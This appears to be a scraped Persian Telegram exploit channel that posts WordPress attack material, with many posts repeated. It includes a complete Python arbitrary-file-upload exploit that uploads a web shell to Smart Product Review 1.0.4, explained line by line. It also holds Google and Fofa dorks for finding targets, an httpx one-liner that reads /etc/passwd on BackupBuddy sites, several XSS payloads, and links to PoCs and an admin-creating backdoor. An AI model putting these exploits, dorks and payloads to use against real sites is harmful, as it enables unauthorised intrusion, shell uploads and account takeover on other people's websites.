#WP #vulnerabilities #Vuln #File_Upload #Wordpress
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.4
جهت مشاهده ی دمو بزنید.
دورک و تحلیل اسکریپت تو پست بعدی
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.4
جهت مشاهده ی دمو بزنید.
دورک و تحلیل اسکریپت تو پست بعدی
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@Tech_Army
#WP #vulnerabilities #Vuln #File_Upload #Wordpress
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.
#Google~Dork:
#Download~Script:
Download
خب بریم ببینیم این اسکریپت چطوری کار میکنه :
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب داره اینجا لایبرری ها رواضافه میکنه
import os.path
from os import path
import json
import requests
import time
import sys
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅ نمایشی از خودش را انداخته اینجا :|
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Republice By : IR0Day.Today Channel")
def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب اینجا داره فانکشینی مبنی بر چک کردن باگ تعریف میکنه
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("No script kiddies please!!" in raw):
return False;
else:
return True;
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅انجام امورات مهم :) اینجا صورت گرفته :
def main():
banner() # Banner ejra mishe
if(len(sys.argv) != 3): #Age toole vurudi kamtar az 3 ta bood
usage(); # ino nemayesh bede
sys.exit(1); # badesh kharej sho
base = sys.argv[1] #argoman 1 ke hamoon targete mesal : google.com
file_path = sys.argv[2] #argoman dovom (inm shelletone )
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعضی چیزارو واسه راحتی کار ریخته توی متغیر
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ; #inja beham chasbunde
check = vuln_check(uri); # khob inja Chizaei ke chasbondaroo mifrestee be function check
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده چک شدن حالا اگه False بود میزنه اسیب پذیر نیست و خارج میشه ولی اگه اسیب پذیر بود میزنن اسیب پذیره و خارج میشه 😐
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅اینجا یه دیکشنری تعریف میکنه که تو متد request لازمه ( البته از نوع پست )
files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}
print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )
✅تو خط بالایی داره دیتا هارو میفرسته
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده ارسال query چک میکنه که فایل شله هست اونجا یا نه اگه بود میزنه حله دهنشو سرویس کن نبود میگه بعدی... و خارج میشه
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)
main();
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب این بود کل قضیه 😐🙌 بابا خیلی جدی نگیرید اینارو
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@TechArmy
➖➖➖➖➖➖➖➖➖➖➖➖
✅آسیب پذیری فایل اپلود در افزونه ی Smart Product Review در نسخه 1.0.
#Google~Dork:
inurl: /wp-content/plugins/smart-product-review/
#Download~Script:
Download
خب بریم ببینیم این اسکریپت چطوری کار میکنه :
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب داره اینجا لایبرری ها رواضافه میکنه
import os.path
from os import path
import json
import requests
import time
import sys
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅ نمایشی از خودش را انداخته اینجا :|
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Republice By : IR0Day.Today Channel")
def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب اینجا داره فانکشینی مبنی بر چک کردن باگ تعریف میکنه
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("No script kiddies please!!" in raw):
return False;
else:
return True;
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅انجام امورات مهم :) اینجا صورت گرفته :
def main():
banner() # Banner ejra mishe
if(len(sys.argv) != 3): #Age toole vurudi kamtar az 3 ta bood
usage(); # ino nemayesh bede
sys.exit(1); # badesh kharej sho
base = sys.argv[1] #argoman 1 ke hamoon targete mesal : google.com
file_path = sys.argv[2] #argoman dovom (inm shelletone )
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعضی چیزارو واسه راحتی کار ریخته توی متغیر
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ; #inja beham chasbunde
check = vuln_check(uri); # khob inja Chizaei ke chasbondaroo mifrestee be function check
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده چک شدن حالا اگه False بود میزنه اسیب پذیر نیست و خارج میشه ولی اگه اسیب پذیر بود میزنن اسیب پذیره و خارج میشه 😐
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
➖➖➖➖➖➖➖➖➖➖➖➖➖
✅اینجا یه دیکشنری تعریف میکنه که تو متد request لازمه ( البته از نوع پست )
files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}
print("Uploading Shell...");
response = requests.post(uri, files=files, data=data )
✅تو خط بالایی داره دیتا هارو میفرسته
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅بعده ارسال query چک میکنه که فایل شله هست اونجا یا نه اگه بود میزنه حله دهنشو سرویس کن نبود میگه بعدی... و خارج میشه
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)
main();
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅خب این بود کل قضیه 😐🙌 بابا خیلی جدی نگیرید اینارو
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
@LearnExploit
@TechArmy
Telegram
AttachLearnExploit
👍2
چندین آسیب پذیری از جمله CVE-2021-25049 و CVE-2021-24865 در پلاگین های Wordpress امکان حمله Xss , SQL Injection , Csrf و ... را برای مهاجم فراهم می کند .
پیشنهاد میشه یوزر ها سریعا اقدام به نصب پچ های امنیتی بکنند .
شناسه آسیب پذیری ها :
CVE-2021-25049
CVE-2021-25062
CVE-2021-25073
CVE-2021-24423
CVE-2021-24906
CVE-2021-25017
CVE-2021-24865
CVE-2021-24858
منبع : Wpscan
#Wpscan #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
پیشنهاد میشه یوزر ها سریعا اقدام به نصب پچ های امنیتی بکنند .
شناسه آسیب پذیری ها :
CVE-2021-25049
CVE-2021-25062
CVE-2021-25073
CVE-2021-24423
CVE-2021-24906
CVE-2021-25017
CVE-2021-24865
CVE-2021-24858
منبع : Wpscan
#Wpscan #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
Wordpress vuln , CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
plugin: backupbuddy
cat hosts |httpx -title -path "/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd" -match-string "root:x:0:0"
#wordpress ——————
0Day.Today
@LearnExploit
@Tech_Army
👍3❤1
Collection of Wordpress Exploits and CVES.
Github
#Wordpress #Exploit #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Wordpress #Exploit #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡2👎2
Wordpress - XSS ( CVE-2022-29455)
/wp-content/plugins/elementor/assets/js/frontend.min.js
usage:
#wordpress #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
/wp-content/plugins/elementor/assets/js/frontend.min.js
usage:
https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==
#wordpress #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥10❤🔥1👍1
Exploiting the xmlrpc.php on all WordPress versions
Read Here
#Exploit #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
Read Here
#Exploit #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥4👍1
در نسخه جدید پلاگین ژاکت:
zhaket.com/web/wp-advanced-support-ticket
باگی وجود داره که میتونید از طریق این پلاگین خیلی ساده به پنل افراد دیگه دسترسی داشته باشید.
site.ir/my-account/tickets/?sss=t&ddd=1
پیلود تست شده :
https://site.ir/my-account/tickets/?action=view&ticket-id=22%3Cscript%3Ealert(1)%3C/script%3E
بجای عدد 1، ایدی عددی یوزر مورد نظرو بزنید. خودکار لاگین میشید.
site.ir/my-account/tickets/?sss=t&ddd=1
#XSS #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
zhaket.com/web/wp-advanced-support-ticket
باگی وجود داره که میتونید از طریق این پلاگین خیلی ساده به پنل افراد دیگه دسترسی داشته باشید.
site.ir/my-account/tickets/?sss=t&ddd=1
پیلود تست شده :
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
پیلود تست شده :https://site.ir/my-account/tickets/?action=view&ticket-id=22%3Cscript%3Ealert(1)%3C/script%3E
بجای عدد 1، ایدی عددی یوزر مورد نظرو بزنید. خودکار لاگین میشید.
site.ir/my-account/tickets/?sss=t&ddd=1
#XSS #WordPress
——————
0Day.Today
@LearnExploit
@Tech_Army
✍6👍3⚡1
wordpress login page allow un-auth cross site scripting (xss)
Payload :
#xss #wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
%22%20accesskey%3dx%20onclick%3dalert(1)%2f%2f
#xss #wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥14👎4⚡1👍1
WordPress Plugin WPML Version < 4.6.1 RXSS vulnerability
Nuclei template: Github
Payload :
——————
0Day.Today
@LearnExploit
@Tech_Army
Nuclei template: Github
Payload :
https://xxxxxxx/wp-login.php?wp_lang=%20=id=x+type=image%20id=xss%20onfoc%3C!%3Eusin+alert(0)%0c
#Wordpress #0day #xss——————
0Day.Today
@LearnExploit
@Tech_Army
👎4🔥3🤝1
CVE-2023-2982
WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass
Github
#bypass #wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass
Github
#bypass #wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
👍9👎3
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
inurl: wp-content/plugins/jupiterx-core/
Shared By XP4➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
⚡5👍2❤🔥1👏1😁1
CVE-2023-38389-@LearnExploit.rar
726.6 KB
#Exploit #Wordpress #JupiterX #Plugin
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
Shared By XP4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
Wordpress JupiterX Core Plugin Unauthenticated Account Takeover Vuln
Dork :
inurl: wp-content/plugins/jupiterx-core/
نکته: با پایتون 2.7 اجرا کنید در غیر این صورت با اررور مواجه میشید.Shared By XP4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
⚡6👍5❤1
CVE-2023-37988 - Wordpress/Plugin - Contact Form Generator [RXSS]
Github
#CVE #Wordpress #RXSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Wordpress #RXSS
——————
0Day.Today
@LearnExploit
@Tech_Army
👍3
بکدور ساخت یوزر ادمین با دسترسی دائم
Link File
#backdoor #wordpress
imem!
——————
0Day.Today
@LearnExploit
@Tech_Army
Link File
#backdoor #wordpress
imem!
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡11❤2🔥2
CVE-2023-6875 - Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥3❤1⚡1
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Query Fofa: body="/wp-content/themes/bricks/"
POC
Nuclei
#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡8❤🔥3🔥3👍1
🚨 از یک چکباکس تا مدیرکل سایت — درسهایی از CVE‑2025‑32281
در ژوئن ۲۰۲۵، آسیبپذیری خطرناکی در افزونه WPKit for Elementor نسخه ≤ 1.1.0 کشف شد که به یک مهاجم اجازه میدهد بدون هیچ مجوزی (Missing Authorization) مقادیر حیاتی در تنظیمات وردپرس را بهدلخواه تغییر دهد. این یعنی حتی بدون ورود به سیستم، امکان ارتقاء حساب کاربری عادی به مدیر کل (Privilege Escalation) وجود دارد.
🔰 برای پابلیک کردن اکسپلویت و اتواسکنر | ری اکشن ها مهمه :)
🔰For publishing exploits and Autoscanner | Reactions are important :)
~ X P 4
#wordpress #PrivilegeEscalation #learn_exploit
IR0Day.Today Bax
@LearnExploit
@IR0DayBax
@Hakfateam
در ژوئن ۲۰۲۵، آسیبپذیری خطرناکی در افزونه WPKit for Elementor نسخه ≤ 1.1.0 کشف شد که به یک مهاجم اجازه میدهد بدون هیچ مجوزی (Missing Authorization) مقادیر حیاتی در تنظیمات وردپرس را بهدلخواه تغییر دهد. این یعنی حتی بدون ورود به سیستم، امکان ارتقاء حساب کاربری عادی به مدیر کل (Privilege Escalation) وجود دارد.
🔰 برای پابلیک کردن اکسپلویت و اتواسکنر | ری اکشن ها مهمه :)
🔰For publishing exploits and Autoscanner | Reactions are important :)
~ X P 4
#wordpress #PrivilegeEscalation #learn_exploit
IR0Day.Today Bax
@LearnExploit
@IR0DayBax
@Hakfateam
❤4❤🔥2